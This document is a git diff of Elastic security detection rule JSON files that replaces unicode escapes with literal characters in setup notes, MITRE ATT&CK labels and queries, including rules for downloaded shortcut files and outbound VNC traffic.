- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_104.json b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_104.json
index 106f69a33ed..455d34b1245 100644
--- a/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_104.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 73,
 "rule_id": "38948d29-3d5d-42e3-8aec-be832aaaf8eb",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_105.json b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_105.json
index a838dd5b266..e61cf6bbfd0 100644
--- a/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_105.json
@@ -47,7 +47,7 @@
 ],
 "risk_score": 73,
 "rule_id": "38948d29-3d5d-42e3-8aec-be832aaaf8eb",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_106.json b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_106.json
index 04cac8527d6..9e0f69257a4 100644
--- a/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_106.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/38e5acdd-5f20-4d99-8fe4-f0a1a592077f_101.json b/packages/security_detection_engine/kibana/security_rule/38e5acdd-5f20-4d99-8fe4-f0a1a592077f_101.json
index 30bbbb8312b..67efeaeb607 100644
--- a/packages/security_detection_engine/kibana/security_rule/38e5acdd-5f20-4d99-8fe4-f0a1a592077f_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/38e5acdd-5f20-4d99-8fe4-f0a1a592077f_101.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/38e5acdd-5f20-4d99-8fe4-f0a1a592077f_102.json b/packages/security_detection_engine/kibana/security_rule/38e5acdd-5f20-4d99-8fe4-f0a1a592077f_102.json
index b890b29a4f8..2f7f039e3cd 100644
--- a/packages/security_detection_engine/kibana/security_rule/38e5acdd-5f20-4d99-8fe4-f0a1a592077f_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/38e5acdd-5f20-4d99-8fe4-f0a1a592077f_102.json
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/38f384e0-aef8-11ed-9a38-f661ea17fbcc_1.json b/packages/security_detection_engine/kibana/security_rule/38f384e0-aef8-11ed-9a38-f661ea17fbcc_1.json
index ccd63a215a3..e4a37023188 100644
--- a/packages/security_detection_engine/kibana/security_rule/38f384e0-aef8-11ed-9a38-f661ea17fbcc_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/38f384e0-aef8-11ed-9a38-f661ea17fbcc_1.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/38f384e0-aef8-11ed-9a38-f661ea17fbcc_2.json b/packages/security_detection_engine/kibana/security_rule/38f384e0-aef8-11ed-9a38-f661ea17fbcc_2.json
index 97a5ef70228..95e7f4818da 100644
--- a/packages/security_detection_engine/kibana/security_rule/38f384e0-aef8-11ed-9a38-f661ea17fbcc_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/38f384e0-aef8-11ed-9a38-f661ea17fbcc_2.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_102.json b/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_102.json
index ca2ec1f2a9a..9d35276da43 100644
--- a/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_102.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_103.json b/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_103.json
index 4bfdcd6969d..f3455693530 100644
--- a/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_103.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_104.json b/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_104.json
index d7a73fcdee7..583aa1186a4 100644
--- a/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_104.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_205.json b/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_205.json
index 812ca21de2a..cb310a2d4bb 100644
--- a/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/39144f38-5284-4f8e-a2ae-e3fd628d90b0_205.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/39157d52-4035-44a8-9d1a-6f8c5f580a07_1.json b/packages/security_detection_engine/kibana/security_rule/39157d52-4035-44a8-9d1a-6f8c5f580a07_1.json
index d19aa5de544..c2ba70ec961 100644
--- a/packages/security_detection_engine/kibana/security_rule/39157d52-4035-44a8-9d1a-6f8c5f580a07_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/39157d52-4035-44a8-9d1a-6f8c5f580a07_1.json
@@ -13,7 +13,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Downloaded Shortcut Files",
- "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension == \"lnk\" and file.Ext.windows.zone_identifier \u003e 1\n",
+ "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension == \"lnk\" and file.Ext.windows.zone_identifier > 1\n",
 "related_integrations": [
 {
 "package": "endpoint",
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -77,7 +77,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_102.json b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_102.json
index 2cb0b19a1f5..5721d81d12e 100644
--- a/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_102.json
@@ -52,7 +52,7 @@
 ],
 "risk_score": 47,
 "rule_id": "397945f3-d39a-4e6f-8bcb-9656c2031438",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_103.json b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_103.json
index 78c3478c5ca..13b48024f90 100644
--- a/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_103.json
@@ -52,7 +52,7 @@
 ],
 "risk_score": 47,
 "rule_id": "397945f3-d39a-4e6f-8bcb-9656c2031438",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_104.json b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_104.json
index fec9a057074..ece45004993 100644
--- a/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_104.json
@@ -52,7 +52,7 @@
 ],
 "risk_score": 47,
 "rule_id": "397945f3-d39a-4e6f-8bcb-9656c2031438",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_105.json b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_105.json
index 7db63b7cf92..9f9ac17910d 100644
--- a/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_105.json
@@ -51,7 +51,7 @@
 ],
 "risk_score": 47,
 "rule_id": "397945f3-d39a-4e6f-8bcb-9656c2031438",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_104.json b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_104.json
index c39516f00e0..67ee69fba4e 100644
--- a/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_104.json
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_105.json b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_105.json
index d55a8e1d13f..82fe69d8df6 100644
--- a/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_105.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_106.json b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_106.json
index 80e1f232ade..1fc0145e37c 100644
--- a/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_106.json
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_107.json b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_107.json
index 8119898a986..06303ea6cf8 100644
--- a/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_107.json
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_108.json b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_108.json
index c3a15daf7c2..f6d190529bc 100644
--- a/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_108.json
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_2.json b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_2.json
index bacfd46f610..7a8db8fd63e 100644
--- a/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_2.json
@@ -52,7 +52,7 @@
 ],
 "risk_score": 47,
 "rule_id": "3a6001a0-0939-4bbe-86f4-47d8faeb7b97",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_3.json b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_3.json
index 04520e62d25..c66ae26f697 100644
--- a/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_3.json
@@ -52,7 +52,7 @@
 ],
 "risk_score": 47,
 "rule_id": "3a6001a0-0939-4bbe-86f4-47d8faeb7b97",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_4.json b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_4.json
index 9b1ee729e69..50869dc6916 100644
--- a/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_4.json
@@ -52,7 +52,7 @@
 ],
 "risk_score": 47,
 "rule_id": "3a6001a0-0939-4bbe-86f4-47d8faeb7b97",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_5.json b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_5.json
index f83d8bfe379..c082993e02e 100644
--- a/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_5.json
@@ -51,7 +51,7 @@
 ],
 "risk_score": 47,
 "rule_id": "3a6001a0-0939-4bbe-86f4-47d8faeb7b97",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_101.json b/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_101.json
index 6c6143875f7..67f878db0c8 100644
--- a/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_101.json
@@ -17,7 +17,7 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "VNC (Virtual Network Computing) to the Internet",
- "query": "event.category:(network or network_traffic) and network.transport:tcp and destination.port \u003e= 5800 and destination.port \u003c= 5810 and\n source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n",
+ "query": "event.category:(network or network_traffic) and network.transport:tcp and destination.port >= 5800 and destination.port <= 5810 and\n source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n",
 "references": [
 "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml"
 ],
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_102.json b/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_102.json
index 1dd1a88d56c..e585e50a2ff 100644
--- a/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/3ad49c61-7adc-42c1-b788-732eda2f5abf_102.json
@@ -15,7 +15,7 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "VNC (Virtual Network Computing) to the Internet",
